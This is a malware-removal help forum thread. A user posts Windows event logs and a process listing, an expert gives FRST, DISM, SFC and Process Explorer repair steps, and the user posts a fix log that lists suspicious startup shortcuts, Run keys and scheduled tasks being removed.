Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..

 

 

Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.

Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.

Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.

Context:  Application, SystemIndex Catalog

Details:
    The system cannot find the file specified.  (HRESULT : 0x80070002) (0x80070002)


Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.

Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.

Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..

Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..

 

 

Process    CPU    Private Bytes    Working Set    PID    Description    Company Name
armsvc.exe        1,324 K    4,976 K    2196    Adobe Acrobat Update Service    Adobe Systems Incorporated
atieclxx.exe        2,156 K    4,112 K    1132        
atiesrxx.exe        920 K    2,340 K    1076    AMD External Events Service Module    AMD
audiodg.exe        6,064 K    10,740 K    3708        
csrss.exe        1,396 K    3,008 K    440        
ctfmon.exe        2,336 K    6,564 K    7876    CTF Loader    Microsoft Corporation
DbxSvc.exe        2,384 K    2,568 K    2124    Dropbox Service    Dropbox, Inc.
dllhost.exe        1,884 K    8,412 K    1332    COM Surrogate    Microsoft Corporation
fontdrvhost.exe        816 K    2,696 K    4780        
hpqbam08.exe        1,856 K    8,404 K    5736    HP CUE Alert Popup Window Objects    Hewlett-Packard Co.
hpqgpc01.exe        2,860 K    11,224 K    6028    GPCore COM object    Hewlett-Packard
hpqste08.exe        4,408 K    11,040 K    5668    HP CUE Status Root    Hewlett-Packard Co.
hpwuschd2.exe        1,192 K    5,292 K    5112    hpwuSchd Application    Hewlett-Packard
MpCmdRun.exe        3,048 K    9,760 K    5520        
mqsvc.exe        3,920 K    5,504 K    2092    Message Queuing Service    Microsoft Corporation
MSASCuiL.exe        3,108 K    10,504 K    4648    Windows Defender notification icon    Microsoft Corporation
procexp.exe        2,844 K    9,752 K    1892    Sysinternals Process Explorer    Sysinternals - www.sysinternals.com
RuntimeBroker.exe        10,124 K    28,808 K    3292    Runtime Broker    Microsoft Corporation
SearchUI.exe    Suspended    50,108 K    54,292 K    1176    Search and Cortana application    Microsoft Corporation
ShellExperienceHost.exe    Suspended    37,440 K    45,568 K    3252    Windows Shell Experience Host    Microsoft Corporation
sihost.exe        4,508 K    15,664 K    3636    Shell Infrastructure Host    Microsoft Corporation
SkypeHost.exe    Suspended    4,680 K    13,220 K    6880    Microsoft Skype Preview    Microsoft Corporation
smartscreen.exe        11,676 K    24,744 K    3824    SmartScreen    Microsoft Corporation
smss.exe        384 K    832 K    340        
SMSvcHost.exe        21,148 K    4,028 K    2832    SMSvcHost.exe    Microsoft Corporation
spoolsv.exe        7,840 K    10,364 K    1704    Spooler SubSystem App    Microsoft Corporation
svchost.exe        2,684 K    5,868 K    4800    Host Process for Windows Services    Microsoft Corporation
svchost.exe        2,012 K    3,816 K    1560    Host Process for Windows Services    Microsoft Corporation
svchost.exe        2,336 K    3,960 K    2056    Host Process for Windows Services    Microsoft Corporation
svchost.exe        1,104 K    2,708 K    2152    Host Process for Windows Services    Microsoft Corporation
svchost.exe        3,920 K    4,916 K    2036    Host Process for Windows Services    Microsoft Corporation
svchost.exe        8,580 K    20,512 K    2076    Host Process for Windows Services    Microsoft Corporation
svchost.exe        4,024 K    5,584 K    1300    Host Process for Windows Services    Microsoft Corporation
svchost.exe        6,452 K    19,520 K    3668    Host Process for Windows Services    Microsoft Corporation
svchost.exe        8,340 K    15,376 K    1152    Host Process for Windows Services    Microsoft Corporation
svchost.exe        14,520 K    15,508 K    1216    Host Process for Windows Services    Microsoft Corporation
svchost.exe        20,400 K    17,104 K    1316    Host Process for Windows Services    Microsoft Corporation
svchost.exe        5,012 K    10,404 K    2180    Host Process for Windows Services    Microsoft Corporation
svchost.exe        5,164 K    10,028 K    840    Host Process for Windows Services    Microsoft Corporation
svchost.exe        1,176 K    3,372 K    1580    Host Process for Windows Services    Microsoft Corporation
svchost.exe        14,928 K    15,924 K    412    Host Process for Windows Services    Microsoft Corporation
SystemSettingsBroker.exe        2,372 K    11,492 K    3704    System Settings Broker    Microsoft Corporation
w3wp.exe        4,304 K    9,172 K    4340        
wininit.exe        1,036 K    2,484 K    560        
winlogon.exe        2,052 K    5,444 K    604        
WUDFHost.exe        2,052 K    4,720 K    1120        
Memory Compression    < 0.01    460 K    108,624 K    2240        
svchost.exe    < 0.01    5,328 K    14,552 K    1340    Host Process for Windows Services    Microsoft Corporation
services.exe    < 0.01    3,100 K    4,856 K    676        
SASCore64.exe    < 0.01    2,032 K    3,464 K    2044        
svchost.exe    < 0.01    10,104 K    17,160 K    772    Host Process for Windows Services    Microsoft Corporation
hpqtra08.exe    0.01    8,908 K    19,144 K    4988    HP Digital Imaging Monitor    Hewlett-Packard Co.
explorer.exe    0.01    4,028 K    6,948 K    5132    Windows Explorer    Microsoft Corporation
lsass.exe    0.01    5,752 K    10,224 K    684    Local Security Authority Process    Microsoft Corporation
regsvr32.exe    0.01    6,096 K    7,456 K    6408    Microsoft© Register Server    Microsoft Corporation
Dropbox.exe    0.02    110,760 K    72,388 K    3388    Dropbox    Dropbox, Inc.
svchost.exe    0.03    131,164 K    43,496 K    1012    Host Process for Windows Services    Microsoft Corporation
SUPERANTISPYWARE.EXE    0.03    16,112 K    5,932 K    4716    SUPERAntiSpyware Application    SUPERAntiSpyware
explorer.exe    0.05    40,640 K    82,312 K    3588    Windows Explorer    Microsoft Corporation
SearchIndexer.exe    0.06    19,124 K    16,664 K    2416    Microsoft Windows Search Indexer    Microsoft Corporation
svchost.exe    0.14    3,308 K    8,784 K    1476    Host Process for Windows Services    Microsoft Corporation
csrss.exe    0.31    2,524 K    5,044 K    540        
firefox.exe    0.38    172,984 K    153,432 K    4656    Firefox    Mozilla Corporation
System Idle Process    0.48    0 K    4 K    0        
NisSrv.exe    0.52    27,056 K    21,728 K    3972    Microsoft Network Realtime Inspection Service    Microsoft Corporation
taskhostw.exe    0.71    35,496 K    43,296 K    3696    Host Process for Windows Tasks    Microsoft Corporation
dwm.exe    1.04    32,128 K    29,864 K    932        
svchost.exe    1.14    105,176 K    107,024 K    968    Host Process for Windows Services    Microsoft Corporation
Interrupts    1.53    0 K    0 K    n/a    Hardware Interrupts and DPCs    
firefox.exe    1.66    353,072 K    333,192 K    6920    Firefox    Mozilla Corporation
regsvr32.exe    1.75    17,504 K    18,632 K    6180    Microsoft© Register Server    Microsoft Corporation
procexp64.exe    2.02    18,932 K    48,636 K    8880    Sysinternals Process Explorer    Sysinternals - www.sysinternals.com
System    2.07    148 K    9,308 K    4        
explorer.exe    4.55    21,424 K    21,176 K    5532    Windows Explorer    Microsoft Corporation
MsMpEng.exe    4.92    133,916 K    93,384 K    1496    Antimalware Service Executable    Microsoft Corporation
explorer.exe    5.69    25,272 K    58,536 K    8552    Windows Explorer    Microsoft Corporation
explorer.exe    9.73    54,148 K    86,580 K    8252    Windows Explorer    Microsoft Corporation
regsvr32.exe    26.58    110,496 K    134,556 K    32    Microsoft© Register Server    Microsoft Corporation
explorer.exe    34.53    312,520 K    315,520 K    10012    Windows Explorer    Microsoft Corporation







 


Edited by preacherswife, 11 January 2017 - 01:31 PM.

  • 0

Advertisements


#2
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP
 
Download the attached fixlist.txt to the same location as FRST
 
[attachment=83455:fixlist.txt]
 
Run FRST and press Fix
A fix log will be generated please post that 
 
 
********
 
Open an elevated command prompt:
For instructions if you don't know how see:
 
 
If you open an elevated command prompt it will by default open in c:\Windows\system32
 
Once you have an elevated command prompt:
 
Type(with an Enter after each line):
 
 DISM  /Online  /Cleanup-Image  /RestoreHealth
 
 (I use two spaces so you can be sure to see where one space goes.)
This will take a while to complete.  Once the prompt returns:
 
Reboot.  Open an elevated Command Prompt again and type (with an Enter after the line):
 
sfc  /scannow
 
 
This will also take a few minutes.  
 
When it finishes it will say one of the following:
 
Windows did not find any integrity violations (a good thing)
Windows Resource Protection found corrupt files and repaired them (a good thing)
Windows Resource Protection found corrupt files but was unable to fix some (or all) of them (not a good thing)
 
If you get the last result then type:
 
findstr  /c:"[SR]"  \windows\logs\cbs\cbs.log  >  \junk.txt 
 
Hit Enter.  Then type::
 
 
notepad  \junk.txt 
 
Hit Enter. 
 
 Copy the text from notepad and paste it into a reply.
 
 
After you finish SFC, regardless of the result:
 
 
 
 
 
1. Please download the Event Viewer Tool by Vino Rosso
and save it to your Desktop:
2. Right-click VEW.exe and Run AS Administrator
3. Under 'Select log to query', select:
 
* System
4. Under 'Select type to list', select:
* Error
* Warning
 
 
Then use the 'Number of events' as follows:
 
 
1. Click the radio button for 'Number of events'
Type 20 in the 1 to 20 box
Then click the Run button.
Notepad will open with the output log.
 
 
Please post the Output log in your next reply then repeat but select Application.  (Each time you run VEW it overwrites the log so copy the first one to a Reply or rename it before running it a second time.)
 
******
 
Run FRST again as before.  Make sure Addition.txt is checked and hit Scan.  Post both logs.
 
 
 
*******
 
Get Process Explorer
 
Save it to your desktop then run it (Vista or Win7 - right click and Run As Administrator).  
 
View, Select Column, check Verified Signer, OK
Options, Verify Image Signatures
 
 
Click twice on the CPU column header  to sort things by CPU usage with the big hitters at the top.  
 
Wait a full minute then:
 
File, Save As, Save.  Note the file name.   Open the file  on your desktop and copy and paste the text to a reply.
 
 

  • 0

#3
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

Did you go back and edit your first post?  I do not get notified if you make changes to a previous post.

 

Please run the fixlist and post the fixlog.


  • 0

#4
preacherswife

preacherswife

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 193 posts

Here are the results of the Fixlist log...

 

HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*ysrtifhuy<*>] => "C:\Users\Dorraine\AppData\Local\360fd\41727.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*iznt<*>] => "C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\14d3a.lnk [2017-01-10]
ShortcutTarget: 14d3a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2a0f0a9d.lnk [2017-01-11]
ShortcutTarget: 2a0f0a9d.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8a6b2.lnk [2016-09-26]
ShortcutTarget: 8a6b2.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f943f.lnk [2016-10-11]
ShortcutTarget: f943f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath
2016-12-16 15:55 - 2016-12-16 15:56 - 00000000 ____D C:\Users\Dorraine\AppData\Local\0bdc3b3d63
2016-12-16 15:23 - 2016-12-16 15:23 - 00000000 ____D C:\Users\Dorraine\AppData\Local\7df78865
2016-05-17 14:51 - 2016-05-17 14:51 - 0000016 _____ () C:\ProgramData\mntemp
2016-05-17 14:51 - 2016-05-17 14:51 - 0004131 _____ () C:\ProgramData\rxsmznjf.zcp
Task: {484686E2-A641-42BE-9D60-660116915CFC} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {4F03D14B-6E47-455B-83EA-E7A664B87E99} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {59B535FB-DCA8-41C6-9358-EAEAF710653D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {63AC7C2E-1E01-4A02-84B0-1558549017E4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {67A22A2A-AA15-4F52-AD6A-062D6178B4C1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {6F4ECD31-E3D7-4C10-B895-82E4C27AA3D0} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {7A59BCF6-FDB6-441C-AFCB-A13B00E6D086} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {7B7D2152-A018-4ECC-B82D-CCE1D62522A4} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {7F33D015-0655-46A8-B3DA-839C16E15F22} - System32\Tasks\{EF120DE6-BF35-43A2-B9B0-F60A443C2B68} => pcalua.exe -a "C:\Program Files (x86)\Xilisoft\YouTube Video Converter\Uninstall.exe"
Task: {815BA402-E344-4BD4-AE42-0CF840DD3A79} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {B4A2EC81-1C16-4D3E-9275-A302BE1F49C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C7F3E5CE-282C-4D59-97CE-2CC1A0287DE7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {CD0C4A4F-7934-4C1C-B5B7-100C05A17EAF} - System32\Tasks\{34CBDC00-3CBA-4835-BC55-E95FC3A0F944} => pcalua.exe -a C:\Users\Dorraine\Downloads\bouncy_snowmen.exe -d C:\Users\Dorraine\Downloads
Task: {CD2C8A99-3A16-49FE-A426-5A21F0049B28} - \Microsoft\Windows\Setup\gwx\rundetector -> No File <==== ATTENTION
Task: {E1DA30AF-E430-47F4-A4A3-0D03A968574D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {EB022CFD-2B91-4BE4-BF5A-BB26BEB9DE8B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F083E0F2-9ED4-4AC1-A705-073D81C43930} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F305E9EB-6B8E-483E-A859-144C5B87F227} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
